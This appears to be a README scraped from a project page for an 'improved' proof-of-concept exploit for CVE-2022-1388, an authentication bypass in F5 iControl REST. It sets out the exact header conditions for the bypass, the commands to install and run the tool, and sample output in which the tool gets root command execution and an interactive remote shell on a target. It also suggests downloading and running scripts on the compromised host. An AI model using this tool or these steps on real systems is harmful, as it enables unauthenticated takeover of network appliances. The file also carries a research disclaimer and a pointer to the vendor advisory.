Improved POC for CVE-2022-1388 that affects multiple F5 products.
This is an improved version of Horizon3's Proof of Concept for CVE-2022-1388: https://github.com/horizon3ai/CVE-2022-1388
This version contains multiple improvements as well as an interactive shell to run remote commands.
Horizon3's technical root cause analysis of the vulnerability can be found on their blog: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Necessary conditions of a request for exploiting this vulnerability:
- Connection header must include X-F5-Auth-Token
- X-F5-Auth-Token header must be present
- Host header must be localhost / 127.0.0.1 or the Connection header must include X-Forwarded-Host
- Auth header must be set with the admin username and any password
- git
- pip3
- python3
- A brain lol
git clone https://github.com/PsychoSec2/CVE-2022-1388-POC.git
cd ./CVE-2022-1388-POC
pip3 install -r requirements.txt
python3 ./CVE-2022-1388.py -hroot@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -t
Running test on target: https://192.168.0.221 | Command: whoami
Response: root
Target is vulnerable!!
Use -s option to run an interactive shell.root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -s
Running interactive shell..
root@f5-localhost: /var/service/restjavad$ Dose not require the use of any reverse tcp connection or listeners.
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -h
Usage: CVE-2022-1388.py [options]
Options:
-h, --help Show this help message.
-u URL, --url=URL The IP address of the target.
-t, --test Test target for CVE-2022-1388.
-s, --shell Run an interactive shell.Please note that while running the interactive shell on an unpatched system, certain commands and syntax's might not work or give you an expected result. This is probably due to the use of JSON in server API requests and resposes. To avoid any issues try not use single characters that are common to JSON syntax such as colons, commas, curly braces, brackets, and especially quotes when using the interactive shell. Any JSON syntax within a command should be structured in format.
Using any sort of unstructured JSON syntax within a command might lead to a malformed API request to the server and could leave you with: no command output, nothing being executed, or it could throw you out of the python script entirely. This dose unfortunately render some commands un-useable. To get around this issue you can instead write a bash script, download it to the server, and exectute it using the interactive shell. It is also not possible to change directories using the 'cd' command.
- Introduction to JSON: https://javaee.github.io/tutorial/jsonp001.html
In any case you should still be able to get basic command output nontheless. If you get no command output, it dose not mean that the command wasn't executed. However, you would have to figure that out using your own analysis.
Update to the latest version or mitigate by following the instructions within the F5 Security Advisory
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent